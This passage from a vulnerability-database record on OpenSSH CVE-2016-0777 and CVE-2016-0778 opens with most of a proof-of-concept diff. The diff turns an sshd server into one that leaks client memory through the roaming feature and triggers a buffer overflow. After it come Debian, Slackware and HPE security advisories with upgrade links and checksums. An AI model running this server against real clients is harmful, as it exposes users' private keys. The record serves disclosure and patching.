client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nUsers with passphrase-less privates keys, especially in non interactive\nsetups (automated jobs using ssh, scp, rsync+ssh etc.) are advised to\nupdate their keys if they have connected to an SSH server they don\u0027t\ntrust. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. \n\nWe recommend that you upgrade your openssh packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] openssh (SSA:2016-014-01)\n\nNew openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. \n This update fixes an information leak and a buffer overflow. \n For more information, see:\n https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778\n *****************************************************************\n * IMPORTANT: READ BELOW ABOUT POTENTIALLY INCOMPATIBLE CHANGES *\n *****************************************************************\n Rather than backport the fix for the information leak (which is the only\n hazardous flaw), we have upgraded to the latest OpenSSH. As of version\n 7.0, OpenSSH has deprecated some older (and presumably less secure)\n algorithms, and also (by default) only allows root login by public-key,\n hostbased and GSSAPI authentication. Make sure that your keys and\n authentication method will allow you to continue accessing your system\n after the upgrade. \n The release notes for OpenSSH 7.0 list the following incompatible changes\n to be aware of:\n * Support for the legacy SSH version 1 protocol is disabled by\n default at compile time. \n * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange\n is disabled by default at run-time. It may be re-enabled using\n the instructions at http://www.openssh.com/legacy.html\n * Support for ssh-dss, ssh-dss-cert-* host and user keys is disabled\n by default at run-time. These may be re-enabled using the\n instructions at http://www.openssh.com/legacy.html\n * Support for the legacy v00 cert format has been removed. \n * The default for the sshd_config(5) PermitRootLogin option has\n changed from \"yes\" to \"prohibit-password\". \n * PermitRootLogin=without-password/prohibit-password now bans all\n interactive authentication methods, allowing only public-key,\n hostbased and GSSAPI authentication (previously it permitted\n keyboard-interactive and password-less authentication if those\n were enabled). \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ncd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz\n\nSlackware x86_64 -current package:\ne13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg openssh-7.1p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n# sh /etc/rc.d/rc.sshd restart\n\nThen before logging out, make sure that you still have remote access!\nSee the information about incompatible changes in OpenSSH 7.x above. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlaYWioACgkQakRjwEAQIjOwpACfXviFRy4mQxr63HyYu9zLgZ+Z\ndVsAn0sLTJYcXuCSQYnXNp+FYuIKWjVh\n=dePf\n-----END PGP SIGNATURE-----\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05247375\nVersion: 1\n\nHPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System\n(vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information,\nRemote Denial of Service (DoS), Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-08-29\nLast Updated: 2016-08-29\n\nPotential Security Impact: Remote Denial of Service (DoS), Disclosure of\nInformation, Unauthorized Modification Of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in the lighttpd and OpenSSH\nversion used in HPE Remote Device Access: Virtual Customer Access System\n(vCAS). These vulnerabilities could be exploited remotely resulting in\nunauthorized modification of information, denial of service (DoS), and\ndisclosure of information. \n\nReferences:\n\nCVE-2015-3200\nCVE-2016-0777\nCVE-2016-0778\nPSRT110211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA\n8.1) and earlier. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3200\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n CVE-2016-0777\n 6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\n\n CVE-2016-0778\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following updates available to resolve the vulnerabilities\nin Remote Device Access: Virtual Customer Access System (vCAS)\n\nvCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and\nhp-rdacas-16.05-10482.ova. \n\nThe Oracle VirtualBox kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova\n\nThe VMware ESX(i) and VMware Player kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova\n\nHISTORY\nVersion:1 (rev.1) - 29 August 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-0777"
},
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
},
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "135282"
},
{
"db": "PACKETSTORM",
"id": "138552"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
